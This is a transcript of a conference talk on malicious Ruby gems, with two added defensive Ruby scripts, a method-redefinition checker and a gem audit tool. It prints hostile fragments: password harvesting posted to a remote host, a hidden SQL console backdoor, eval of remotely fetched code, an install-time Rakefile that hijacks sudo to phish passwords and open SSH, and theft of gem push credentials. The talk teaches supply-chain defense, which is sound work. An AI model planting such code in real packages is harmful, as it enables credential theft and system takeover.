Hacking with Gems (Ancient City Ruby)

Benjamin Smith

April 05, 2013

Transcript

  1. Hacking with Gems Benjamin Smith @benjamin_smith

  2. How-to get rich quick and (maybe) not go to jail!

  3. Ben Smith cannot be held accountable for anything that will happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE'S gems. This offer may not be combined with any other offers. Ben Smith's gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith's gems may contain substances known in the state of California to cause cancer.
  4. who i am

  5. None
  6. None
  7. None
  8. what i am NOT

  9. None
  10-11. please do not try this at home

  12. how it all started
    GEM
      remote: https://rubygems.org/
      specs:
        actionmailer (3.2.12)
          actionpack (= 3.2.12)
          mail (~> 2.4.4)
        actionpack (3.2.12)
          activemodel (= 3.2.12)
          activesupport (= 3.2.12)
          builder (~> 3.0.0)
          erubis (~> 2.7.0)
        ...
  13. what’s the worst that could happen?

  14. None
  15. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  16. before... github.com/benjaminleesmith/awesome-rails-flash-messages

  17. after! github.com/benjaminleesmith/awesome-rails-flash-messages

  18. some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  19. ...
    File.open("#{Rails.root}/public/development.log", 'a+') do |f|
      f.write("#{params.inspect}\n")
    end
    github.com/benjaminleesmith/awesome-rails-flash-messages

  20. ?!?
    Net::HTTP.post_form(
      URI.parse(Base64.decode64('aHR0cDo...')),
      { 'log' => params.merge(:url => request.url).inspect }
    )
    github.com/benjaminleesmith/awesome-rails-flash-messages

  21. i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  22. i like password if params.to_s.match("password") github.com/benjaminleesmith/awesome-rails-flash-messages

  23. "development.log" ... "user"=>{"email"=>"test@example.com", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages

  24. elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

  25. profit
    • Step 1: do something
    • Step 2: do something else
    • Step 3: ????
    • Step 4: profit
  26-30. profit (revealed one step per slide)
    • Step 1: write a gem that does something
    • Step 2: add code to harvest emails/pws
    • Step 3: use emails/pws on banking websites to transfer funds
    • Step 4: profit
    • Step 5: flee the country
  31. a one way ticket to

  32. that was easy. what else can I do?

  33. gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

  34. show me the hack
    Net::HTTP.post_form(#<URI::HTTP:0x007fc76b706950 URL:http://stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ...
    github.com/benjaminleesmith/net_http_detector
  35-37. how it works
    def HTTP.valid_post_form(url, params)
      ...
    def HTTP.post_form(url, params)
      self.smart_log("Net::HTTP.post_form(#{url.inspect}, #{params.inspect})")
      Net::HTTP.valid_post_form(url, params)
    end
    github.com/benjaminleesmith/net_http_detector
  38. ...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector
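A defender's counterpart to the wrapper on the "how it works" slides, added here as an example and not taken from the talk or from the net_http_detector gem: a Ruby method's Method#source_location tells you which file last defined it, so an application can check at boot whether choke points such as Net::HTTP.post_form are still defined by the standard library or have been replaced by code living in a gem. The watch list, the stdlib-directory heuristic (RbConfig's rubylibdir and archdir) and the gem-name attribution are my assumptions; a hit is something to read, not proof of malice, since legitimate gems such as webmock also wrap Net::HTTP.

```ruby
require 'net/http'
require 'rbconfig'

# Directories holding Ruby's own standard library. A watched method whose
# defining file lies outside them was (re)defined by a gem or by app code.
# Assumption: rubylibdir/archdir are where this interpreter keeps its stdlib.
STDLIB_DIRS = RbConfig::CONFIG.values_at('rubylibdir', 'archdir').compact.map { |d| File.expand_path(d) }

# Choke points worth watching: the method the talk's gem wraps, the other
# Net::HTTP entry points, and the process-spawning primitives. Extend as needed.
WATCHED_METHODS = [
  [Net::HTTP, :post_form],
  [Net::HTTP, :get],
  [Net::HTTP, :start],
  [Kernel, :system],
  [Kernel, :spawn],
]

# File that currently defines owner.name, or nil for methods implemented in C.
# Replacing a C method from Ruby always leaves a Ruby source location behind.
def definition_site(owner, name)
  location = owner.method(name).source_location
  location && location.first
end

# True when a Ruby-level definition lives outside the standard library.
def foreign?(path)
  return false if path.nil?
  full = File.expand_path(path)
  STDLIB_DIRS.none? { |dir| full.start_with?(dir + File::SEPARATOR) }
end

# Human-readable attribution: the gem name when the file sits under a gems
# directory, otherwise the raw path.
def attribution(path)
  gem_name = path[%r{/gems/([^/]+)/}, 1]
  gem_name ? "gem #{gem_name}" : path
end

# Returns [[owner_name, method_name, defining_file], ...] for every watched
# method whose current definition does not come from the standard library.
def redefined_methods(watched = WATCHED_METHODS)
  watched.each_with_object([]) do |(owner, name), hits|
    path = definition_site(owner, name)
    hits << [owner.name, name, path] if foreign?(path)
  end
end

if __FILE__ == $PROGRAM_NAME
  hits = redefined_methods
  puts 'all watched methods come from the standard library' if hits.empty?
  hits.each { |owner, name, path| puts "#{owner}.#{name} is defined in #{attribution(path)}" }
end
```

Run it from a Rails initializer or a boot-time rake task after Bundler has required everything, so that whatever the gems did to Net::HTTP has already happened when the check runs.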

  39-42. database what?
    append_before_filter :net_http_detector
    ...
    if params[:db_console]
      @tables = ActiveRecord::Base.connection.tables
      if params[:query]
        @output = ActiveRecord::Base.connection.execute(params[:query])
    github.com/benjaminleesmith/net_http_detector
  43. /users/sign_in github.com/benjaminleesmith/net_http_detector

  44. /users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

  45. hello db access! github.com/benjaminleesmith/net_http_detector

  46. SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

  47. UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

  48. CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

  49. careful of wolves in sheep’s clothing

  50-55. profit (revealed one step per slide)
    • Step 1: write a gem that does something
    • Step 2: add code to provide DB access
    • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran)
    • Step 4: profit
    • Step 5: flee the country
  56. i like the beach

  57. that was easy. what else can I do?

  58. gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

  59. what it claims to do
    Date.new(2005, 1, 1).to_s(:short) => "1 Jan"
    ... instead of ... => " 1 Jan"
    github.com/benjaminleesmith/better_date_to_s
  60. None
  61. what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s

  62. better_date_to_s.bundle [the slide shows the raw bytes of a compiled Mach-O bundle (__TEXT, __DATA and __LINKEDIT segments), not readable as text] github.com/benjaminleesmith/better_date_to_s
  63. behind the curtain
    if(strcmp(rails_env, "production") == 0) {
      sprintf(tar_command, "tar -zcvf %s/public/assets.tar.gz %s > /dev/null 2>&1", rails_root, rails_root);
      system(tar_command);
    }
    github.com/benjaminleesmith/better_date_to_s
  64. what what github.com/benjaminleesmith/better_date_to_s

  65. i can haz source github.com/benjaminleesmith/better_date_to_s

  66. truth time
    • this gem doesn't actually work
    • but it could... if I wasn't lazy
    • "fat" gems are tricky to compile
    github.com/benjaminleesmith/better_date_to_s
  67. so much code so little time
    • Step 1: write a gem that does something
    • Step 2: add code to expose source
    • Step 3: sell to competitors?
    • Step 4: profit?
    • Step 5: flee the country
  68. that was easy hard. what else can I do? (that's easier)
  69. gem install be_truthy github.com/benjaminleesmith/be_truthy

  70. what it does
    > true.should be_true
    > User.new.should be_true
    > User.new.should be_truthy
    github.com/benjaminleesmith/be_truthy
  71. what it ACTUALLY does github.com/benjaminleesmith/be_truthy

  72. github.com/benjaminleesmith/be_truthy

  73. file tree looks ok github.com/benjaminleesmith/be_truthy

  74. source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

  75. but what was this? github.com/benjaminleesmith/be_truthy

  76. I see no C github.com/benjaminleesmith/be_truthy

  77. run the what file?
    Gem::Specification.new do |gem|
      ...
      gem.extensions = ["Rakefile"]
      ...
    end
    github.com/benjaminleesmith/be_truthy
  78. there is no Rakefile github.com/benjaminleesmith/be_truthy

  79-80. the real file tree github.com/benjaminleesmith/be_truthy

  81. what does the Rakefile do? github.com/benjaminleesmith/be_truthy

  82. sudo_file = __FILE__.gsub('Rakefile', 'lib/tmp.rb')
    FileUtils.mv(sudo_file, "#{home_dir}/.tmp")
    github.com/benjaminleesmith/be_truthy

  83. File.open(profile, 'a+') do |f|
      f.write("alias sudo='ruby #{home}/.tmp'\n")
    end
    github.com/benjaminleesmith/be_truthy

  84. FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

  85. what does "sudo" do now? github.com/benjaminleesmith/be_truthy

  86-89. print "WARNING: Improper use of the sudo command ..."
    system "stty -echo"
    password = $stdin.gets.chomp
    system "stty echo"
    print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`
    github.com/benjaminleesmith/be_truthy
  90. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

  91. /usr/bin/sudo dscl . -create /Users/#{username}
    ...
    /usr/bin/sudo dscl . -passwd /Users/#{username} password`
    github.com/benjaminleesmith/be_truthy
  92. Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy

  93. ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

  94. take away: don't install ben's gems

  95. None
  96. how could I get you to install my gems?

  97. what gems are trustworthy?

  98. how can I add my code to already trusted gems?

  99-102. back in the be_truthy gem
    gem_api_key = File.open(`echo ~/.gem/credentials`.strip).read
    gem_list = `gem list`
    Net::HTTP.post_form(...)
    github.com/benjaminleesmith/be_truthy
  103. now I own your gems github.com/benjaminleesmith/be_truthy

  104. > git clone your-gem-repo
    ...add a little code...
    > rake build
    > gem push your-gem
    github.com/benjaminleesmith/be_truthy
  105. do people trust your gems?

  106. do people who install your gems have trustworthy gems?

  107. None
  108. there’s still one problem

  109. bootstrapping

  110. being popular sucks

  111. conferences

  112. webmock

  113. rspec-given

  114. quacky

  115. social engineering

  116. None
  117. None
  118. • matt • smoe • bttf • james • tlittle • rbabcock • nusco • ixil • Stuart • eileen • jay • Michael • christopher.mcnabb
  119. so what happens now?

  120. ruby gems goes down

  121. heroku deploys go down

  122. i go to the beach

  123. ruby gems goes down

  124. heroku deploys go down

  125. recovery

  126. so what now?

  127. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  128. Little Snitch obdev.at/products/littlesnitch/index.html

  129. gem install be_truthy github.com/benjaminleesmith/be_truthy

  130. fseventer fernlightning.com/doku.php?id=software:fseventer:start

  131. don’t “gem install” from strangers

  132. gem fetch vs gem install
    > gem fetch be_truthy
    > gem unpack be_truthy-0.0.1.gem
    github.com/benjaminleesmith/be_truthy
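The fetch-then-unpack habit from the slide above can be scripted. What follows is an added example, not code from the talk or from any of the gems it describes: a Ruby audit that reads a fetched .gem's metadata through RubyGems' own Gem::Package class and reports the things the be_truthy and better_date_to_s slides turn on, namely spec.extensions entries (which gem install executes), extension build scripts packed inside the gem, and prebuilt binaries that ship no source to read. The category names and the lists of build-script and binary file names are my choices, not a RubyGems definition; extend them to match what your extension builders and platforms actually use.

```ruby
require 'rubygems'
require 'rubygems/package'

# Prebuilt native code shipped inside a gem. You cannot read these the way you
# read lib/*.rb; the slide's better_date_to_s.bundle is one of them.
# Assumption: this list of suffixes covers the platforms you care about.
PREBUILT_BINARY = /\.(bundle|so|dylib|dll)\z/i

# File names RubyGems' extension builders execute during `gem install`.
# The be_truthy slide lists "Rakefile" as its extension.
INSTALL_TIME_SCRIPTS = /\A(Rakefile|mkrf_conf\.rb|extconf\.rb|configure)\z/

# Audit a gem from its metadata (a Gem::Specification) and the list of paths
# packed in data.tar.gz. Returns a Hash of findings keyed by category; an empty
# Hash means no install-time or opaque artefacts were found. It does not mean
# the gem is harmless: everything under lib/ still runs once your app requires it.
def audit(spec, files)
  findings = {
    install_time_code: [],   # spec.extensions entries: run during `gem install`
    missing_extensions: [],  # extension named in metadata but not packaged
    build_scripts: [],       # packaged files an extension builder would execute
    prebuilt_binaries: [],   # compiled code with no source to read
  }

  spec.extensions.each do |ext|
    findings[:install_time_code] << ext
    # Metadata and contents disagreeing is itself worth a look.
    findings[:missing_extensions] << ext unless files.include?(ext)
  end

  files.each do |path|
    findings[:build_scripts] << path if INSTALL_TIME_SCRIPTS.match?(File.basename(path))
    findings[:prebuilt_binaries] << path if PREBUILT_BINARY.match?(path)
  end

  findings.reject { |_, paths| paths.empty? }
end

# Audit a .gem file that `gem fetch` downloaded, without installing it.
# Gem::Package reads metadata.gz and lists data.tar.gz for us.
def audit_gem(path)
  package = Gem::Package.new(path)
  audit(package.spec, package.contents)
end

if __FILE__ == $PROGRAM_NAME
  ARGV.each do |gem_path|
    puts gem_path
    report = audit_gem(gem_path)
    puts '  nothing install-time or opaque found' if report.empty?
    report.each { |category, paths| puts "  #{category}: #{paths.join(', ')}" }
  end
end
```

Usage: `gem fetch be_truthy` followed by `ruby audit_gem.rb be_truthy-0.0.1.gem`. Anything listed under install_time_code or build_scripts is code that runs with your user's privileges the moment you type gem install, so read it before you do; a gem that claims to be pure Ruby but carries prebuilt_binaries deserves the same treatment as the "I see no C" slide.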
  133. None
  134. None
  135. curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby

  136. gem install rails -P HighSecurity

  137. > gem install rails -P HighSecurity
    Fetching: activesupport-3.2.12.gem (100%)
    ERROR:  While executing gem ... (Gem::Exception)
        Unsigned gem
  138. gem cert --build

  139. https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust

  140. sandboxing

  141. github.com/rubygems/rubygems

  142. tools to detect malicious code

  143. private gem repos

  144. do not try this at home

  145. don't install gems you don't need to

  146. pay attention to what your gems do

  147. monitor your system

  148. read the source

  149. gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

  150. on install github.com/benjaminleesmith/coal-mine-canary

  151. the results github.com/benjaminleesmith/coal-mine-canary

  152. thank you!

  153. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith